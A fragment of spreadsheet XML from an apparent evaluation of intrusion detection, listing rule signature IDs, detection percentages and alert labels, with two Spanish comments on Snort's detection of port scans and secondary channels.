2023640, 2023753, 2024217, 2024297, 2024766, 2024930, 2025649, 2025650, 2025712, 2025822, 2025992, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100254, 2100312, 2100385, 2100469, 2100472, 2100527, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101616, 2101620, 2101852, 2102003, 2102336, 2102924, 2400005, 2400010, 2400011, 2400013, 2400014, 2400017, 2400021, 2400032, 2400033, 2400060, 2400061, 2403416, 2403501, 2403506, 2403538, 2403539, 2403540, 2403541, 2403542, 2403543, 2403550, 2403551, 2403560, 2403561, 2403578, 2403579, 2403596, 2403616, 2403618, 2403622, 2403624, 2403652, 2403656, 2403677, 2403678, 2403826, 2403830, 2403838, 2403839, 2403878, 2403882, 2403888, 2522304, 2522312, 2527028, 2527030, 2527036</t>
  </si>
  <si>
    <t>254, 385, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1546, 1616, 1735, 1852, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 29456, 31136, 41978, 42255, 42340, 42944</t>
  </si>
  <si>
    <t>1, 2, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 254, 385, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1546, 1616, 1735, 1852, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 29456, 31136, 34799, 41978, 42255, 42340, 42944, 2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2024297, 2025649, 2025650, 2025712, 2025822, 2025992, 2027412, 2027413, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>7.27%</t>
  </si>
  <si>
    <t>0.00%</t>
  </si>
  <si>
    <t>22.73%</t>
  </si>
  <si>
    <t>34799, 41978, 42944</t>
  </si>
  <si>
    <t>2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2024297, 2025649, 2025650, 2025992, 2029575, 2102924</t>
  </si>
  <si>
    <t>34799, 41978, 42944, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2024297, 2025649, 2025650, 2025992, 2029575, 2102924</t>
  </si>
  <si>
    <t>1394, 1735, 2050, 2924, 3679, 4990, 5318, 6699, 11192, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 16282, 16301, 16418, 16510, 16642, 17458, 17494, 18174, 18611, 20566, 22097, 23493, 23861, 24096, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 32481, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 41978, 42255, 42944, 43359, 43362, 43755, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 47082, 48894, 49040, 50447, 50633, 51284, 57756, 57878, 59258, 59597</t>
  </si>
  <si>
    <t>2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2003595, 2006408, 2006409, 2009151, 2009205, 2009206, 2009207, 2009208, 2009970, 2010518, 2010706, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2022218, 2024217, 2024297, 2024766, 2024930, 2025649, 2025650, 2025992, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1394, 1735, 2050, 2924, 3679, 4990, 5318, 6699, 11192, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 16282, 16301, 16418, 16510, 16642, 17458, 17494, 18174, 18611, 20566, 22097, 23493, 23861, 24096, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 32481, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 41978, 42255, 42944, 43359, 43362, 43755, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 47082, 48894, 49040, 50447, 50633, 51284, 57756, 57878, 59258, 59597, 2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2003595, 2006408, 2006409, 2009151, 2009205, 2009206, 2009207, 2009208, 2009970, 2010518, 2010706, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2022218, 2024217, 2024297, 2024766, 2024930, 2025649, 2025650, 2025992, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1394, 1546, 1735, 2050, 2924, 28555, 31136, 41978, 42255, 42944</t>
  </si>
  <si>
    <t>1394, 1546, 1735, 2050, 2924, 28555, 31136, 34799, 41978, 42255, 42944, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2024297, 2025649, 2025650, 2025992, 2029575, 2102924</t>
  </si>
  <si>
    <t>48.18%</t>
  </si>
  <si>
    <t>16.36%</t>
  </si>
  <si>
    <t>44.55%</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16035, 16083, 16178, 16195, 16206, 16208, 16250, 16267, 16270, 16321, 16331, 16492, 16864, 16983, 17017, 17136, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 29081, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35284, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 40169, 40503, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42966, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 47173, 52452, 54381, 57032, 60856, 7929858, 10000483</t>
  </si>
  <si>
    <t>DNS, ISF, Microsoft, RPC, SIPVicious</t>
  </si>
  <si>
    <t>DNS, ISF, Microsoft, RPC, SIPVicious, dns-base, portmapper, sip, snmpv1-get-request</t>
  </si>
  <si>
    <t>68.18%</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16035, 16083, 16178, 16195, 16208, 16250, 16270, 16321, 16331, 16492, 16983, 17017, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 29081, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 40169, 40503, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 47173, 52452, 54381, 57032, 60856, 7929858, 10000483</t>
  </si>
  <si>
    <t>ISF, Microsoft, SIPVicious, dns-base, sip, snmpv1-get-request</t>
  </si>
  <si>
    <t>6, 10328, 12766, 15832, 15839, 15880, 15985, 16001, 16009, 16035, 16040, 16041, 16178, 16208, 16253, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17399, 17458, 17459, 17714, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 28631, 28632, 28754, 28877, 29081, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31989, 32304, 32447, 33053, 33224, 33661, 33704, 33759, 34067, 34527, 34640, 34797, 35284, 35640, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40503, 40774, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 44114, 44135, 44467, 44504, 45302, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 8912906, 107937801, 108658691, 294191108</t>
  </si>
  <si>
    <t>1, 109010003, DNS, Netis/Netcore, SIP, SIPVicious, ZeroAccess.Gen, gtp-u, gtpv1-c, sip, snmpv2-get-request, ssdp, unknown-udp, upnp</t>
  </si>
  <si>
    <t>95.45%</t>
  </si>
  <si>
    <t>6, 10328, 11767, 12090, 12525, 12766, 15511, 15832, 15839, 15880, 15893, 15895, 15897, 15985, 16001, 16009, 16035, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16208, 16250, 16253, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17017, 17136, 17399, 17458, 17459, 17714, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 29081, 29511, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 31989, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 33759, 34038, 34067, 34527, 34640, 34789, 34797, 35284, 35640, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40169, 40503, 40774, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43963, 44114, 44135, 44467, 44504, 44611, 44624, 45302, 45360, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 7929858, 8912906, 10000483, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>1, 109010003, DNS, ISF, Metasploit, Microsoft, Netis/Netcore, Non-RFC, SIP, SIPVicious, ZeroAccess.Gen, dns-base, gtp-u, gtpv1-c, incomplete, ms-ds-smb-base, ms-ds-smbv1, sip, snmpv2-get-request, ssdp, unknown-udp, upnp</t>
  </si>
  <si>
    <t>93.64%</t>
  </si>
  <si>
    <t>10328, 12090, 12525, 12766, 17714, 17717, 29511, 30703, 32447, 33106, 35640, 35662, 40774, 42781, 43796, 43799, 43814, 43963, 44135, 45360, 45650, 47173, 48805, 7929858, 8912906, 107937798, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>6, 10328, 11767, 12090, 12525, 12766, 15511, 15832, 15839, 15880, 15893, 15895, 15897, 15985, 16001, 16009, 16035, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17011, 17017, 17136, 17399, 17458, 17459, 17714, 17717, 24466, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 29081, 29511, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 31989, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 33759, 34038, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35640, 35662, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40169, 40503, 40774, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43814, 43963, 44114, 44135, 44467, 44504, 44611, 44623, 44624, 45302, 45360, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 7929858, 8912906, 10000483, 107937798, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>1, 9999, 109010003, DNS, ISF, Metasploit, Microsoft, Netis/Netcore, Non-RFC, RPC, SIP, SIPVicious, Suspicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>1, 9999, 109010003, DNS, ISF, Metasploit, Microsoft, Netis/Netcore, Non-RFC, RPC, SIP, SIPVicious, Suspicious, ZeroAccess.Gen, dns-base, gtp-u, gtpv1-c, incomplete, ms-ds-smb-base, ms-ds-smbv1, portmapper, sip, snmpv1-get-request, snmpv2-get-request, ssdp, ssl, unknown-udp, upnp</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16035, 16083, 16178, 16195, 16206, 16208, 16250, 16267, 16270, 16321, 16331, 16492, 16864, 16983, 17017, 17136, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 29081, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35284, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 40169, 40503, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42966, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 47173, 52452, 54381, 57032, 60856, 10000483</t>
  </si>
  <si>
    <t>RPC, SIPVicious, dns-base, portmapper, sip, snmpv1-get-request</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16035, 16083, 16178, 16195, 16208, 16250, 16270, 16321, 16331, 16492, 16983, 17017, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 29081, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 40169, 40503, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 47173, 52452, 54381, 57032, 60856, 10000483</t>
  </si>
  <si>
    <t>SIPVicious, dns-base, sip, snmpv1-get-request</t>
  </si>
  <si>
    <t>6, 10328, 12766, 15832, 15839, 15880, 15985, 16001, 16009, 16035, 16040, 16041, 16178, 16208, 16253, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17399, 17458, 17459, 17714, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 28631, 28632, 28754, 28877, 29081, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31989, 32304, 32447, 33053, 33224, 33661, 33704, 33759, 34067, 34527, 34640, 34797, 35284, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40503, 40774, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 44114, 44135, 44467, 44504, 45302, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 107937801, 108658691, 294191108</t>
  </si>
  <si>
    <t>DNS, Netis/Netcore, SIPVicious, ZeroAccess.Gen, sip, snmpv2-get-request, upnp</t>
  </si>
  <si>
    <t>6, 10328, 11767, 12090, 12525, 12766, 15511, 15832, 15839, 15880, 15893, 15895, 15897, 15985, 16001, 16009, 16035, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16208, 16250, 16253, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17017, 17136, 17399, 17458, 17459, 17714, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 29081, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 31989, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 33759, 34038, 34067, 34527, 34640, 34789, 34797, 35284, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40169, 40503, 40774, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43963, 44114, 44135, 44467, 44504, 44611, 44624, 45302, 45360, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 10000483, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>DNS, Netis/Netcore, SIPVicious, ZeroAccess.Gen, dns-base, ms-ds-smb-base, sip, snmpv2-get-request, upnp</t>
  </si>
  <si>
    <t>10328, 12090, 12525, 12766, 17714, 17717, 30703, 32447, 33106, 35662, 40774, 42781, 43796, 43799, 43814, 43963, 44135, 45360, 45650, 47173, 48805, 107937798, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>DNS, Metasploit, Microsoft, Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>26.36%</t>
  </si>
  <si>
    <t>6, 10328, 11767, 12090, 12525, 12766, 15511, 15832, 15839, 15880, 15893, 15895, 15897, 15985, 16001, 16009, 16035, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16983, 16996, 17011, 17017, 17136, 17399, 17458, 17459, 17714, 17717, 24466, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 29081, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 31989, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 33759, 34038, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35662, 35799, 35824, 35944, 36591, 36660, 36817, 37359, 38131, 38732, 38924, 40169, 40503, 40774, 41469, 41470, 41474, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43814, 43963, 44114, 44135, 44467, 44504, 44611, 44623, 44624, 45302, 45360, 45416, 45650, 46289, 46478, 47173, 48805, 51546, 51609, 52452, 54381, 57032, 60099, 60856, 10000483, 107937798, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>DNS, Metasploit, Microsoft, Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen, dns-base, ms-ds-smb-base, ms-ds-smbv1, portmapper, sip, snmpv1-get-request, snmpv2-get-request, ssl, upnp</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16083, 16178, 16195, 16206, 16208, 16250, 16267, 16270, 16321, 16331, 16492, 16864, 17017, 17136, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35284, 35799, 35824, 35944, 36660, 38131, 40503, 41469, 41470, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42966, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 52452, 54381, 57032, 60856</t>
  </si>
  <si>
    <t>RPC, SIPVicious, dns-base, portmapper, sip</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15832, 15893, 15895, 15897, 16001, 16009, 16083, 16178, 16195, 16208, 16250, 16270, 16321, 16331, 16492, 17017, 24466, 24473, 25360, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35799, 35824, 35944, 36660, 38131, 40503, 41469, 41470, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 43349, 43796, 43799, 43963, 44611, 44623, 46289, 52452, 54381, 57032, 60856</t>
  </si>
  <si>
    <t>SIPVicious, dns-base, sip</t>
  </si>
  <si>
    <t>82.73%</t>
  </si>
  <si>
    <t>6, 15832, 15839, 15880, 15985, 16001, 16009, 16040, 16041, 16178, 16208, 16253, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16996, 17399, 17458, 17459, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 32304, 32447, 33053, 33224, 33661, 33704, 34067, 34527, 34640, 34797, 35284, 35799, 35824, 35944, 36660, 38131, 38732, 38924, 40503, 40774, 41470, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 44114, 44467, 45302, 45416, 45650, 46289, 46478, 51609, 52452, 54381, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>6, 11767, 12090, 15511, 15832, 15839, 15880, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16083, 16173, 16178, 16195, 16208, 16253, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16996, 17017, 17399, 17458, 17459, 17717, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 34067, 34527, 34640, 34789, 34797, 35284, 35799, 35824, 35944, 36660, 38131, 38732, 38924, 40503, 40774, 41470, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43963, 44114, 44467, 44611, 44624, 45302, 45416, 45650, 46289, 46478, 51609, 52452, 54381, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>Netis/Netcore, SIPVicious, ZeroAccess.Gen, dns-base, ms-ds-smb-base, sip</t>
  </si>
  <si>
    <t>90.91%</t>
  </si>
  <si>
    <t>12090, 17717, 30703, 32447, 33106, 35662, 40774, 42781, 43796, 43799, 43963, 45650</t>
  </si>
  <si>
    <t>Metasploit, Microsoft, Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>6, 11767, 12090, 15511, 15832, 15839, 15880, 15893, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16864, 16996, 17011, 17017, 17136, 17399, 17458, 17459, 17717, 24466, 24473, 25360, 25843, 26487, 26631, 27210, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 30703, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 34038, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35662, 35799, 35824, 35944, 36660, 38131, 38732, 38924, 40503, 40774, 41469, 41470, 41475, 41540, 41542, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43799, 43963, 44114, 44467, 44611, 44623, 44624, 45302, 45416, 45650, 46289, 46478, 51609, 52452, 54381, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>Metasploit, Microsoft, Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen, dns-base, ms-ds-smb-base, ms-ds-smbv1, portmapper, sip, ssl</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15895, 15897, 16001, 16009, 16083, 16178, 16195, 16206, 16208, 16250, 16267, 16270, 16321, 16331, 16492, 17017, 17136, 24466, 24473, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35284, 35824, 38131, 40503, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 42966, 43349, 43796, 43963, 44611, 44623, 52452, 57032, 60856</t>
  </si>
  <si>
    <t>6, 12090, 15511, 15895, 15897, 16001, 16009, 16083, 16178, 16195, 16208, 16250, 16270, 16321, 16331, 16492, 17017, 24466, 24473, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33106, 33704, 34050, 34527, 34640, 34789, 35824, 38131, 40503, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 43349, 43796, 43963, 44611, 44623, 52452, 57032, 60856</t>
  </si>
  <si>
    <t>6, 15880, 15985, 16001, 16009, 16040, 16041, 16178, 16208, 16253, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17399, 17717, 24473, 25843, 26487, 26631, 27238, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 32304, 32447, 33053, 33224, 33661, 33704, 34067, 34527, 34640, 34797, 35284, 35824, 38131, 38732, 40503, 40774, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 44114, 44467, 45302, 45416, 45650, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>Netis/Netcore, ZeroAccess.Gen, sip</t>
  </si>
  <si>
    <t>6, 11767, 12090, 15511, 15880, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16173, 16178, 16195, 16208, 16253, 16267, 16270, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17017, 17136, 17399, 17717, 24473, 25843, 26487, 26631, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 34067, 34527, 34640, 34789, 34797, 35284, 35824, 38131, 38732, 40503, 40774, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43963, 44114, 44467, 44611, 45302, 45416, 45650, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>83.64%</t>
  </si>
  <si>
    <t>12090, 17717, 32447, 33106, 35662, 40774, 42781, 43796, 43963, 45650</t>
  </si>
  <si>
    <t>6, 11767, 12090, 15511, 15880, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16060, 16083, 16173, 16178, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17011, 17017, 17136, 17399, 17717, 24466, 24473, 25843, 26487, 26631, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33106, 33224, 33661, 33704, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35662, 35824, 38131, 38732, 40503, 40774, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43963, 44114, 44467, 44611, 44623, 44624, 45302, 45416, 45650, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>Netis/Netcore, ZeroAccess.Gen, sip, ssl</t>
  </si>
  <si>
    <t>30.91%</t>
  </si>
  <si>
    <t>49.09%</t>
  </si>
  <si>
    <t>15895, 15897, 16001, 16009, 16083, 16195, 16206, 16208, 16250, 16267, 16270, 16321, 16331, 16492, 17017, 17136, 24466, 24473, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33704, 34050, 34527, 34640, 34789, 35284, 35824, 38131, 40503, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 42966, 43349, 43796, 43963, 44611, 44623, 52452, 57032, 60856</t>
  </si>
  <si>
    <t>12.73%</t>
  </si>
  <si>
    <t>15880, 15985, 16001, 16009, 16040, 16041, 16208, 16253, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17399, 17717, 24473, 25843, 26487, 26631, 27238, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 32304, 32447, 33053, 33224, 33661, 33704, 34067, 34527, 34640, 34797, 35284, 35824, 38131, 38732, 40503, 40774, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 44114, 44467, 45302, 45416, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>11767, 15880, 15897, 15985, 16001, 16009, 16040, 16041, 16173, 16195, 16208, 16253, 16267, 16270, 16309, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17011, 17017, 17136, 17399, 17717, 24473, 25843, 26487, 26631, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33224, 33661, 33704, 34067, 34527, 34640, 34789, 34797, 35284, 35824, 38131, 38732, 40503, 40774, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43963, 44114, 44467, 44611, 45302, 45416, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>80.91%</t>
  </si>
  <si>
    <t>11767, 15880, 15895, 15897, 15985, 16001, 16009, 16040, 16041, 16060, 16083, 16173, 16195, 16206, 16208, 16250, 16253, 16265, 16267, 16270, 16309, 16321, 16331, 16435, 16492, 16573, 16613, 16614, 16618, 16632, 16714, 16774, 16996, 17011, 17017, 17136, 17399, 17717, 24466, 24473, 25843, 26487, 26631, 27238, 27457, 28198, 28631, 28632, 28754, 28877, 30061, 30090, 30251, 31077, 31137, 31349, 31613, 31618, 31755, 32304, 32447, 32609, 33053, 33224, 33661, 33704, 34039, 34050, 34067, 34527, 34640, 34789, 34795, 34797, 35284, 35824, 38131, 38732, 40503, 40774, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 42781, 42899, 42966, 43349, 43355, 43796, 43963, 44114, 44467, 44611, 44623, 44624, 45302, 45416, 51609, 52452, 57032, 60099, 60856</t>
  </si>
  <si>
    <t>32.73%</t>
  </si>
  <si>
    <t>Instancias Colaterales: el ataque incluye el establecimiento del canal primario además del secundario, siendo éste último el relevante para el ataque. Snort detecta ambos satisfactoriamente.</t>
  </si>
  <si>
    <t>Ataques Detectados: Snort sólo dispone de reglas asociadas al escaneo de los puertos más comunes. Por esta razón, los porcentajes de detección son bastante bajos y se alejan del 100%, pues tan sólo se detecta el intento de descubrimiento de un rango minúsculo de puertos</t>
  </si>
  <si>
